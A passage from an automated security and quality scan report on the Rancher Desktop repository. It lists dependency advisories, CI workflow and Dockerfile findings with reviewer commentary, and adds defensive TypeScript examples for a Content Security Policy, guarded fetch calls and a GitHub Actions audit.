src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4980
Escaper bypass leads to XSS in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4981
Crash when handling long CNAME response in net
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4982
Bypass of meta content URL escaping causes XSS in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4986
Quadratic string concatenation in consumeComment in net/mail
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-5037
Inefficient candidate hostname parsing in crypto/x509
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-5038
Quadratic complexity in WordDecoder.DecodeHeader in mime
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-5039
Arbitrary inputs are included in errors without any escaping in net/textproto
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 svgo: GHSA-xpqw-6gx7-v673
SVGO DoS through entity expansion in DOCTYPE (Billion Laughs)
yarn.lock
high Security checks software dependencies conf 0.88 tmp: GHSA-ph9p-34f9-6g65
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
yarn.lock
high System graph api Wiring conf 1.00 Dangling fetch: GET http://127.0.0.1:${ port }/v1/namespaces (pkg/rancher-desktop/backend/steve.ts:228)
`pkg/rancher-desktop/backend/steve.ts:228` calls `GET http://127.0.0.1:${ port }/v1/namespaces` but no backend route in this repository matches that path. The target is a loopback service on a port chosen at runtime, not a handler defined in this code base, so an unmatched route is the expected result and the 'runtime 404' framing does not follow; treat this as informational unless the service itself is found not to be running. Tool: fetch. Normalized path used for matching: `/http:/127.0.0.1:/<p>/v1/namespaces`. If this points at an external API, p…
Tags: Dangling fetch · Fetch
medium Security checks security auth conf 0.92 [AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
The missing file is the scanner's own policy format; its absence is a coverage gap for the tool, not a defect in the code. Grade authorization on the route inventory below instead.
high Security checks security auth conf 0.74 [AUC002] Low visible authorization coverage in route inventory: Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
A 0.0% figure on a desktop application such as this one usually means the route inventory picked up HTTP client calls (to local Kubernetes, Steve and similar services) rather than server handlers the project itself exposes. Confirm which discovered routes are actually served by code in this repository before accepting the high rating.
low Security checks security Injection conf 0.50 [SEC005] Command Injection Risk: Unsafe shell execution or eval of user input.
The cited file is a Node.js Yarn plugin, so the Python-flavoured remediation does not apply as written. In Node, prefer `child_process.execFile` or `spawn` with an argument array over `exec` with a concatenated command string, and never pass untrusted input to `eval` or `new Function`. A Yarn plugin runs with the developer's privileges during `yarn install`, which is the context in which to weigh this.
.yarn/plugins/plugin-rancher-desktop-license-checker.cjs:80
high Security checks quality Quality conf 0.72 Agent control bridge may listen on a network interface without visible auth
Agent, MCP, sidecar, and command bridge servers often start as local helpers. Binding them to 0.0.0.0 or a default all-interface listener without an authorization guard can expose tool execution or session data to the LAN.
pkg/rancher-desktop/backend/wsl.ts:30
medium Security checks software dependencies conf 0.88 ajv: GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option
yarn.lock
medium Security checks software dependencies conf 0.88 brace-expansion: GHSA-f886-m6hf-6m8v
brace-expansion: Zero-step sequence causes process hang and memory exhaustion
yarn.lock
medium Security checks software dependencies conf 0.88 brace-expansion: GHSA-jxxr-4gwj-5jf2
brace-expansion: Large numeric range defeats documented `max` DoS protection
yarn.lock
medium Security checks cicd CI/CD security conf 0.90 Docker build context has no .dockerignore
Without .dockerignore, build context can include source history, local env files, dependencies, and generated artifacts.
.dockerignore
Tags: CI/CD security · containers
high Security checks cicd CI/CD security conf 0.82 3 occurrences Docker final stage has no non-root USER
Docker images run as root unless the Dockerfile (or its base image) switches to a non-root user with a `USER` instruction in the final stage. All three hits are under bats/tests/.../testdata, i.e. fixtures for the BATS integration suite rather than images shipped to users, so the practical exposure is limited to test runs; note that the 'excluding tests' filter did not catch them.
3 files, 3 locations
bats/tests/compose/testdata/Dockerfile.nginx:2
bats/tests/compose/testdata/app/Dockerfile:2
bats/tests/extensions/testdata/Dockerfile:13
Tags: CI/CD security · containers
medium Security checks software dependencies conf 0.88 follow-redirects: GHSA-r4q5-vmmm-2653
follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets
yarn.lock
high Security checks quality Quality conf 0.74 Frontend API reference is not matched by discovered backend routes
A string in the cited file references an API path that the scanner could not match to a route in this repository's backend inventory. The file is a Kubernetes client, so the paths it builds are served by the cluster's API server, not by code in this repo; an unmatched route is expected there and is not by itself evidence of a live 404 in a user journey.
pkg/rancher-desktop/backend/kube/client.ts:273
high Security checks software dependencies conf 0.90 GitHub Action `actions/checkout@v3` is 3 major version(s) behind (latest v6.0.3)
`uses: actions/checkout@v3` is 3 major versions behind the latest published release v6.0.3. Old action majors target Node runtimes GitHub has deprecated and miss upstream fixes; this is the 'outdated GitHub Action' class Dependabot also raises. When upgrading, pin the new release by full commit SHA rather than by tag.
src/go/networking/.github/workflows/release.yaml:19
high Security checks software dependencies conf 0.90 GitHub Action `actions/checkout@v3` is 3 major version(s) behind (latest v6.0.3)
`uses: actions/checkout@v3` is 3 major versions behind the latest published release v6.0.3. Same remediation as the release.yaml hit above: move to the current major and pin it by full commit SHA.
src/go/networking/.github/workflows/go.yaml:14
high Security checks software dependencies conf 0.90 GitHub Action `actions/download-artifact@v3` is 5 major version(s) behind (latest v8.0.1)
`uses: actions/download-artifact@v3` is 5 major versions behind the latest published release v8.0.1. Old action majors target Node runtimes GitHub has deprecated and miss upstream fixes; this is the 'outdated GitHub Action' class Dependabot also raises. Upgrade together with upload-artifact, since the two must be on compatible majors, and pin by full commit SHA.
src/go/networking/.github/workflows/release.yaml:51
high Security checks software dependencies conf 0.90 GitHub Action `actions/setup-go@v3` is 3 major version(s) behind (latest v6.4.0)
`uses: actions/setup-go@v3` is 3 major versions behind the latest published release v6.4.0. Old action majors target Node runtimes GitHub has deprecated and miss upstream fixes; this is the 'outdated GitHub Action' class Dependabot also raises. When upgrading, pin the new release by full commit SHA rather than by tag.
src/go/networking/.github/workflows/release.yaml:23
high Security checks software dependencies conf 0.90 GitHub Action `actions/setup-go@v3` is 3 major version(s) behind (latest v6.4.0)
`uses: actions/setup-go@v3` is 3 major versions behind the latest published release v6.4.0. Same remediation as the release.yaml hit above: move to the current major and pin it by full commit SHA.
src/go/networking/.github/workflows/go.yaml:19
high Security checks software dependencies conf 0.90 GitHub Action `actions/upload-artifact@v3` is 4 major version(s) behind (latest v7.0.1)
`uses: actions/upload-artifact@v3` is 4 major versions behind the latest published release v7.0.1. Old action majors target Node runtimes GitHub has deprecated and miss upstream fixes; this is the 'outdated GitHub Action' class Dependabot also raises. Upgrade together with download-artifact, since the two must be on compatible majors, and pin by full commit SHA.
src/go/networking/.github/workflows/release.yaml:34
high Security checks software dependencies conf 0.90 GitHub Action `golangci/golangci-lint-action@v3.1.0` is 6 major version(s) behind (latest v9.2.1)
`uses: golangci/golangci-lint-action@v3.1.0` is 6 major versions behind the latest published release v9.2.1. Old action majors target Node runtimes GitHub has deprecated and miss upstream fixes; this is the 'outdated GitHub Action' class Dependabot also raises. When upgrading, pin the new release by full commit SHA rather than by tag.
src/go/networking/.github/workflows/go.yaml:28
medium Security checks software dependencies conf 0.88 github.com/docker/docker: GHSA-vp62-88p7-qqf5
Docker: Race condition in docker cp allows creation of arbitrary empty files on the host via symlink swap
src/go/guestagent/go.mod
medium Security checks software dependencies conf 0.88 ip-address: GHSA-v2v4-37r5-5v8g
ip-address has XSS in Address6 HTML-emitting methods
yarn.lock
medium Security checks software dependencies conf 0.88 js-yaml: GHSA-mh29-5h37-fv8m
js-yaml has prototype pollution in merge (<<)
yarn.lock
medium Security checks software dependencies conf 0.88 path-to-regexp: GHSA-27v5-c462-wpq7
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple wildcards
yarn.lock
medium Security checks software dependencies conf 0.88 picomatch: GHSA-3v7f-55p6-f55p
Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching
yarn.lock
medium Security checks software dependencies conf 0.88 postcss: GHSA-7fh5-64p2-3v2j
PostCSS line return parsing error
yarn.lock
medium Security checks software dependencies conf 0.88 postcss: GHSA-qx2v-qp2m-jg93
PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
yarn.lock
medium Security checks quality Quality conf 0.70 Public web app has no Content Security Policy
A Content Security Policy reduces the blast radius of injected scripts if the app is ever served through preview, static hosting, or a web container outside its normal sandbox. Here index.html is the entry page of an Electron renderer rather than a public site, which changes the delivery mechanism but not the advice: Electron's security checklist asks for a CSP on every renderer, set either with a `<meta http-equiv="Content-Security-Policy">` tag in the page or by rewriting response headers in the main process through `session.webRequest.onHeadersReceived`, so that a script injected through a compromised dependency cannot load remote code or call eval.
index.html
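An added example, not code from the scanned repository, of how an Electron renderer gets a policy without a web server in front of it: a main-process hook that rewrites every response's headers. The directive values, the loopback origin in `connect-src` and the `withCsp`/`installCsp` names are assumptions; the Electron callback types are sketched inline so the file runs without electron installed.

```typescript
// Added example (not Rancher Desktop code): attach a Content-Security-Policy to
// every response the renderer receives, via Electron's onHeadersReceived hook.
// The directive values and the withCsp/installCsp names are assumptions.

// No remote or inline script, no eval, no plugins, no framing. 'unsafe-inline'
// is kept for styles only, because component frameworks inject scoped <style>.
// connect-src lists the loopback origin the renderer is assumed to call; adjust
// it to the endpoints the app really uses (assumption, not taken from the repo).
const RENDERER_CSP = [
  "default-src 'self'",
  "script-src 'self'",
  "style-src 'self' 'unsafe-inline'",
  "img-src 'self' data:",
  "connect-src 'self' http://127.0.0.1:*",
  "object-src 'none'",
  "base-uri 'none'",
  "frame-ancestors 'none'",
].join('; ');

// Electron hands onHeadersReceived a details object whose responseHeaders map
// header names to string arrays; the listener answers through a callback.
type HeaderMap = Record<string, string[]>;
interface HeadersReceivedDetails { url: string; responseHeaders?: HeaderMap; }
type HeadersReceivedCallback = (response: { responseHeaders?: HeaderMap }) => void;

// Pure part: copy the headers, dropping any CSP the origin sent (whatever its
// case) so a weaker upstream policy cannot override ours, then set the policy.
function withCsp(headers: HeaderMap | undefined, policy: string = RENDERER_CSP): HeaderMap {
  const out: HeaderMap = {};
  for (const [name, value] of Object.entries(headers ?? {})) {
    if (name.toLowerCase() !== 'content-security-policy') {
      out[name] = value;
    }
  }
  out['Content-Security-Policy'] = [policy];
  return out;
}

function cspListener(details: HeadersReceivedDetails, callback: HeadersReceivedCallback): void {
  callback({ responseHeaders: withCsp(details.responseHeaders) });
}

// Wiring, done once in the main process after app.whenReady():
//   import { session } from 'electron';
//   installCsp(session.defaultSession);
// The session is a parameter so this file runs without importing electron.
interface SessionLike {
  webRequest: { onHeadersReceived(listener: typeof cspListener): void };
}
function installCsp(ses: SessionLike): void {
  ses.webRequest.onHeadersReceived(cspListener);
}

// Reviewer self-check: does a policy forbid inline and eval'd script, and
// avoid a wildcard source for scripts? A missing script-src fails the check
// because the reviewer should see the directive spelled out.
function cspForbidsInlineScript(policy: string): boolean {
  const scriptSrc = policy
    .split(';')
    .map((d) => d.trim())
    .find((d) => d.startsWith('script-src '));
  if (!scriptSrc) {
    return false;
  }
  return !/'unsafe-inline'|'unsafe-eval'|(^|\s)\*(\s|$)/.test(scriptSrc);
}

// Stand-alone demonstration with a constructed response (no Electron involved).
cspListener(
  { url: 'app://./index.html', responseHeaders: { 'content-security-policy': ['default-src *'] } },
  (r) => console.log(JSON.stringify(r.responseHeaders)),
);
```

The upstream-CSP replacement matters for extension or remote pages the renderer may load: a `default-src *` from the origin must not survive the merge. Tighten `connect-src` to the exact loopback ports the renderer calls; a wildcard port is the weakest directive in this policy.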
medium Security checks quality Quality conf 0.78 Public web service has no security.txt
security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt. This repository ships a desktop application and has no origin to serve that path from; for a code repository the equivalent is a SECURITY.md at the root, which GitHub surfaces in the Security tab, and the security.txt belongs on the project's website, wherever that is hosted.
.well-known/security.txt
medium Security checks software dependencies conf 0.88 qs: GHSA-6rw7-vpxm-498p
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
yarn.lock
medium Security checks software dependencies conf 0.88 qs: GHSA-q8mj-m7cp-5q26
qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set
yarn.lock
medium Security checks software dependencies conf 0.88 serialize-javascript: GHSA-qj8w-gfj5-8c6v
Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects
yarn.lock
medium Security checks software dependencies conf 0.88 uuid: GHSA-w5hq-g745-h8pq
uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided
yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-4v9v-hfq4-rm2v
webpack-dev-server users' source code may be stolen when they access a malicious web site
yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-79cf-xcqc-c78w
webpack-dev-server vulnerable to cross-origin source code exposure on non-HTTPS origins
yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-9jgg-88mc-972h
webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser
yarn.lock
medium Security checks software dependencies conf 0.88 ws: GHSA-58qx-3vcg-4xpx
ws: Uninitialized memory disclosure
yarn.lock
medium Security checks software dependencies conf 0.88 yaml: GHSA-48c2-rrv3-qjmp
yaml is vulnerable to Stack Overflow via deeply nested YAML collections
yarn.lock
medium System graph quality Integrity conf 1.00 15 occurrences `fetch()` without try/catch or AbortSignal
Bare `fetch(...)` rejects on a DNS, connection or TLS failure, and a rejection nobody catches surfaces as an unhandled rejection in the calling process instead of a failed request. Wrap the call in try/catch or attach a `.catch(...)`. An AbortSignal with a timeout is a complement, not a substitute: it bounds how long a stalled connection can hang, but the abort itself rejects the promise and still needs the handler. In the e2e specs an unhandled rejection simply fails the test, so the backend, main and store locations are the ones that matter.
15 files, 15 locations
e2e/backend.e2e.spec.ts:71
e2e/credentials-server.e2e.spec.ts:281
e2e/extensions.e2e.spec.ts:139
e2e/rdctl.e2e.spec.ts:146
pkg/rancher-desktop/backend/containerClient/registry.ts:17
pkg/rancher-desktop/backend/k3sHelper.ts:446
pkg/rancher-desktop/main/extensions/manager.ts:258
pkg/rancher-desktop/main/update/LonghornProvider.ts:293
pkg/rancher-desktop/store/credentials.ts:33
pkg/rancher-desktop/store/diagnostics.ts:118
pkg/rancher-desktop/store/extensions.ts:61
pkg/rancher-desktop/store/preferences.ts:138
pkg/rancher-desktop/store/snapshots.ts:21
pkg/rancher-desktop/store/transientSettings.ts:54
pkg/rancher-desktop/utils/protocols.ts:52
runtime safety · Robustness
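An added example, not code from the scanned repository, of the guard these findings ask for: a wrapper that turns every failure mode of fetch (HTTP error, network error, timeout) into a returned value, with the timeout implemented through an AbortController so a stalled socket is actually torn down. The `guardedFetch` name, the outcome shape and the fake transports that stand in for the network are assumptions.

```typescript
// Added example (not Rancher Desktop code): a guarded fetch wrapper for the
// bare-fetch findings. The helper names and the fake transports are assumptions.

// Minimal shapes so the example does not depend on DOM or Node type libraries.
interface ResponseLike { ok: boolean; status: number; text(): Promise<string>; }
type FetchLike = (url: string, init?: { signal?: AbortSignal }) => Promise<ResponseLike>;

// Every failure mode is reported through one discriminated union instead of an
// unhandled rejection that the caller never sees.
type FetchOutcome =
  | { kind: 'ok'; status: number; body: string }
  | { kind: 'http'; status: number }
  | { kind: 'timeout'; afterMs: number }
  | { kind: 'network'; message: string };

async function guardedFetch(
  url: string,
  timeoutMs: number,
  fetchImpl: FetchLike = (globalThis as any).fetch as FetchLike,
): Promise<FetchOutcome> {
  const controller = new AbortController();
  // Abort the request (not just the wait) when the deadline passes, so a
  // stalled connection cannot hold the caller forever.
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    const res = await fetchImpl(url, { signal: controller.signal });
    if (!res.ok) {
      return { kind: 'http', status: res.status };
    }
    return { kind: 'ok', status: res.status, body: await res.text() };
  } catch (err: unknown) {
    // The abort also arrives here as a rejection; tell it apart by the signal.
    if (controller.signal.aborted) {
      return { kind: 'timeout', afterMs: timeoutMs };
    }
    return { kind: 'network', message: err instanceof Error ? err.message : String(err) };
  } finally {
    clearTimeout(timer); // never leak the timer on the success path
  }
}

// Constructed fake transports standing in for the network (no real server).
const fakeOk: FetchLike = async () => ({ ok: true, status: 200, text: async () => '{"v":1}' });
const fakeDown: FetchLike = async () => { throw new Error('connect ECONNREFUSED 127.0.0.1:6443'); };
const fakeHttp404: FetchLike = async () => ({ ok: false, status: 404, text: async () => 'not found' });
// A transport that never answers unless the signal fires, like a hung port-forward.
const fakeHang: FetchLike = (_url, init) =>
  new Promise((_resolve, reject) => {
    init?.signal?.addEventListener('abort', () => reject(new Error('aborted')));
  });

// Runs the four cases side by side; the URL is an assumed loopback endpoint.
async function demo(): Promise<FetchOutcome[]> {
  const url = 'http://127.0.0.1:6443/version';
  return Promise.all([
    guardedFetch(url, 1000, fakeOk),
    guardedFetch(url, 1000, fakeDown),
    guardedFetch(url, 1000, fakeHttp404),
    guardedFetch(url, 50, fakeHang),
  ]);
}

demo().then((outcomes) => outcomes.forEach((o) => console.log(JSON.stringify(o))));
```

Returning an outcome instead of throwing forces each call site to decide what a failure means (retry, surface to the UI, or degrade), which is the decision the bare calls currently skip. Where the code base already has a logger per module, the `network` branch is where the message should go.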
medium System graph hardware Security conf 1.00 2 occurrences Dockerfile runs as root
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image. Both files sit under bats/tests/…/testdata and are fixtures for the BATS integration suite rather than images the project ships, so this is not a production exposure; adding a USER line is still cheap and keeps the fixtures from modelling the wrong pattern.
2 files, 2 locations
bats/tests/compose/testdata/app/Dockerfile
bats/tests/extensions/testdata/Dockerfile
Container
medium System graph cicd CI/CD security conf 1.00 9 occurrences GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Set a read-only top-level `permissions:` block and raise individual scopes per job only where that job needs them. One of the listed files is expected to ask for write scopes: OpenSSF Scorecard's published workflow template requests `security-events: write` and `id-token: write` at job level, so for scorecard.yml the check is that those are the only write scopes and that the top level stays read-only.
9 files, 9 locations
.github/workflows/k3s-versions.yaml
.github/workflows/rddepman.yaml
.github/workflows/rdx-host-api-tests.yaml
.github/workflows/release-merge-to-main.yaml
.github/workflows/scorecard.yml
.github/workflows/smoke-test.yaml
.github/workflows/upgrade-generate.yaml
.github/workflows/yarn-dedupe.yaml
CI/CD security · Supply chain · Github actions
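An added example, not code from the scanned repository, that covers this finding and the outdated-action findings above for `src/go/networking/.github/workflows/`: a small audit over workflow text that flags tag-pinned actions, stale majors and write scopes in the top-level permissions block. The sample workflow, the table of latest majors and the placeholder SHA of forty zeros are constructed, as are the rule names.

```typescript
// Added example (not Rancher Desktop code): audit GitHub Actions workflow text
// for mutable action refs, stale action majors and broad GITHUB_TOKEN
// permissions. The sample workflow, LATEST_MAJOR and the rule names are constructed.

interface ActionRef { line: number; name: string; ref: string; versionHint?: string; }
interface Finding { line: number; rule: string; detail: string; }

// What "latest" means is an input to the audit. Constructed values: a real run
// would take them from the actions' release pages or from Dependabot.
const LATEST_MAJOR: Record<string, number> = {
  'actions/checkout': 6,
  'actions/setup-go': 6,
  'actions/upload-artifact': 7,
};

const FULL_SHA = /^[0-9a-f]{40}$/;
// `- uses: owner/repo[/path]@ref   # v1.2.3` (the comment is the pin tools' convention)
const USES_LINE = /^\s*-?\s*uses:\s*([\w.-]+\/[\w.-]+)(?:\/[^@\s]+)?@(\S+)(?:\s*#\s*(\S+))?/;

function parseUses(text: string): ActionRef[] {
  const refs: ActionRef[] = [];
  text.split('\n').forEach((raw, i) => {
    const m = raw.match(USES_LINE);
    if (m) {
      refs.push({ line: i + 1, name: m[1], ref: m[2], versionHint: m[3] });
    }
  });
  return refs;
}

function majorOf(version: string | undefined): number | undefined {
  const m = version?.match(/^v?(\d+)/);
  return m ? Number(m[1]) : undefined;
}

function auditActions(text: string): Finding[] {
  const out: Finding[] = [];
  for (const a of parseUses(text)) {
    const pinned = FULL_SHA.test(a.ref);
    if (!pinned) {
      out.push({ line: a.line, rule: 'mutable-ref',
        detail: `${a.name}@${a.ref} is a tag or branch; pin to a commit SHA` });
    }
    // For a SHA pin the version is only knowable from the trailing comment.
    const major = majorOf(pinned ? a.versionHint : a.ref);
    const latest = LATEST_MAJOR[a.name];
    if (major !== undefined && latest !== undefined && major < latest) {
      out.push({ line: a.line, rule: 'stale-major',
        detail: `${a.name} v${major} is ${latest - major} major(s) behind v${latest}` });
    }
  }
  return out;
}

// The top-level `permissions:` block sets what GITHUB_TOKEN may do in every job.
function auditPermissions(text: string): Finding[] {
  const lines = text.split('\n');
  const idx = lines.findIndex((l) => /^permissions:/.test(l));
  if (idx === -1) {
    return [{ line: 1, rule: 'permissions-default',
      detail: 'no top-level permissions block; token gets the repository default' }];
  }
  const out: Finding[] = [];
  if (/^permissions:\s*write-all\b/.test(lines[idx])) {
    out.push({ line: idx + 1, rule: 'permissions-write-all', detail: 'write on every scope' });
  }
  for (let j = idx + 1; j < lines.length && /^\s+\S/.test(lines[j]); j++) {
    const m = lines[j].match(/^\s+([\w-]+):\s*write\b/);
    if (m) {
      out.push({ line: j + 1, rule: 'permissions-write', detail: `${m[1]}: write` });
    }
  }
  return out;
}

// Constructed sample; the 40-zero "SHA" is a placeholder, not a real commit.
const SAMPLE_WORKFLOW = `name: release
on:
  push:
    tags: ['v*']
permissions:
  contents: write
  packages: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: actions/setup-go@v3
      - uses: actions/upload-artifact@${'0'.repeat(40)} # v7.0.1
`;

function auditWorkflow(text: string): Finding[] {
  return [...auditActions(text), ...auditPermissions(text)];
}

auditWorkflow(SAMPLE_WORKFLOW).forEach((f) => console.log(`line ${f.line} ${f.rule}: ${f.detail}`));
```

Pinning to a SHA is what removes the tag-retargeting risk; the version comment after the SHA is what lets Dependabot's `github-actions` ecosystem keep bumping it. Remember that nothing under `src/go/networking/.github/` runs until it is moved to the root `.github/workflows`, so fix the root workflows first.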
medium System graph security security conf 1.00 Insecure pattern 'weak_hash' in src/go/networking/.github/workflows/release.yaml:54
Found a known-risky pattern (weak_hash). Review and replace if possible. This is a text match, so look at what the line does: in a release workflow the usual hit is a checksum command (md5sum or sha1sum) used to publish artifact digests, and a digest meant for consumers to verify downloads should be SHA-256 (sha256sum) so they are not trusting a collision-prone hash. If the match is only an algorithm name in a comment or filename, mark it a false positive.
src/go/networking/.github/workflows/release.yaml:54 Weak hash
low Security checks quality Error handling conf 1.00 3 occurrences [ERR003] Ignored Error (Go): Ignoring error return values.
Handle the error, or at minimum log it with enough context to debug the failure. The `errcheck` linter is part of golangci-lint, which the networking module's go.yaml already invokes; check that the lint configuration does not disable it, so new instances fail CI instead of accumulating.
3 files, 3 locations
src/go/guestagent/pkg/kube/servicewatcher_linux.go:51
src/go/guestagent/pkg/procnet/loopback_forwarder_linux.go:117
src/go/networking/cmd/host/switch_windows.go:162
low Security checks software dependencies conf 0.88 brace-expansion: GHSA-v6h2-p8h4-qcjw
brace-expansion Regular Expression Denial of Service vulnerability
yarn.lock
low Security checks software dependencies conf 0.88 cookie: GHSA-pxg6-pf52-xh8x
cookie accepts cookie name, path, and domain with out of bounds characters
yarn.lock
low Security checks software dependencies conf 0.88 diff: GHSA-73rr-hh4g-fpgx
jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch
yarn.lock
low Security checks quality Quality conf 0.60 30 occurrences Duplicated implementation block across source files
Duplicate implementation blocks are maintenance debt. Keep them visible, but they are not a high-severity defect unless the duplicated logic is security-sensitive or drifting.
12 files, 14 locations
pkg/rancher-desktop/components/Preferences/BodyWsl.vue:29, 30 (2 hits)
src/go/networking/cmd/host/switch_windows.go:1, 2 (2 hits)
pkg/rancher-desktop/backend/containerClient/nerdctlClient.ts:152
pkg/rancher-desktop/backend/images/nerdctlImageProcessor.ts:38
pkg/rancher-desktop/backend/kube/wsl.ts:57
pkg/rancher-desktop/components/ContainerShell.vue:71
pkg/rancher-desktop/components/Preferences/BodyContainerEngine.vue:33
pkg/rancher-desktop/components/Preferences/BodyVirtualMachine.vue:21
duplication · quality
low Security checks quality Quality conf 0.70 Generated build artifact directory is present at repository root
Committed build outputs and caches make scans slower, confuse duplicate-code checks, and give AI agents stale generated code to imitate.
build:1
low Security checks software dependencies conf 0.90 npm package `@vue/eslint-config-typescript` is minor version(s) behind (14.7.0 -> 14.8.0)
`@vue/eslint-config-typescript` is pinned/resolved at 14.7.0 but the latest stable release on the npm registry is 14.8.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update…
package.json
low Security checks software dependencies conf 0.90 npm package `@yarnpkg/cli` is minor version(s) behind (4.15.0 -> 4.16.0)
`@yarnpkg/cli` is pinned/resolved at 4.15.0 but the latest stable release on the npm registry is 4.16.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 npm package `node-addon-api` is minor version(s) behind (8 -> 8.8.0)
`node-addon-api` is pinned/resolved at 8 but the latest stable release on the npm registry is 8.8.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise. Note that `8` is a major-only range, so the version actually installed is whatever yarn.lock resolved it to; compare the lockfile entry, not the manifest range, before deciding whether anything is behind.
package.json
low Security checks software dependencies conf 0.90 npm package `node-gyp` is minor version(s) behind (12.3.0 -> 12.4.0)
`node-gyp` is pinned/resolved at 12.3.0 but the latest stable release on the npm registry is 12.4.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 npm package `ts-loader` is minor version(s) behind (^9.5.7 -> 9.6.0)
`ts-loader` is pinned/resolved at ^9.5.7 but the latest stable release on the npm registry is 9.6.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise. As with `node-addon-api` above, `^9.5.7` is a range; the installed version is the one recorded in yarn.lock, which is what to check.
package.json
low Security checks software dependencies conf 0.88 on-headers: GHSA-76c9-3jph-rj3q
on-headers is vulnerable to http response header manipulation
yarn.lock
low Security checks quality Quality conf 0.64 Public docs site has no llms.txt
AI coding agents increasingly read llms.txt to find canonical docs and API workflows. Without it, agents are more likely to browse pages repeatedly or use stale instructions. This repository builds a desktop application and serves no public pages, so this and the humans.txt, robots.txt and sitemap findings below apply to wherever the documentation site is hosted, not here; treat all four as informational for this repo.
llms.txt
low Security checks quality Quality conf 0.50 Public web app has no humans.txt
humans.txt is optional, but it gives operators and reviewers a simple place to find ownership, contact, and important public documentation links.
humans.txt
low Security checks quality Quality conf 0.74 Public web app has no robots.txt
Public websites should publish a robots.txt file so crawlers and AI agents can discover crawl rules and sitemap locations without guessing.
robots.txt
low Security checks quality Quality conf 0.72 Public web app has no sitemap
A sitemap gives search engines, docs crawlers, and AI agents a structured list of public pages. Without one, important docs and product pages are easy to miss.
sitemap.xml
low Security checks software dependencies conf 0.88 qs: GHSA-w7fw-mjwx-w883
qs's arrayLimit bypass in comma parsing allows denial of service
yarn.lock
low Security checks software dependencies conf 0.88 tmp: GHSA-52f5-9888-hmc6
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
yarn.lock
low Security checks software dependencies conf 0.88 webpack: GHSA-38r7-794h-5758
webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence
yarn.lock
low Security checks software dependencies conf 0.88 webpack: GHSA-8fgc-7cc6-rx7x
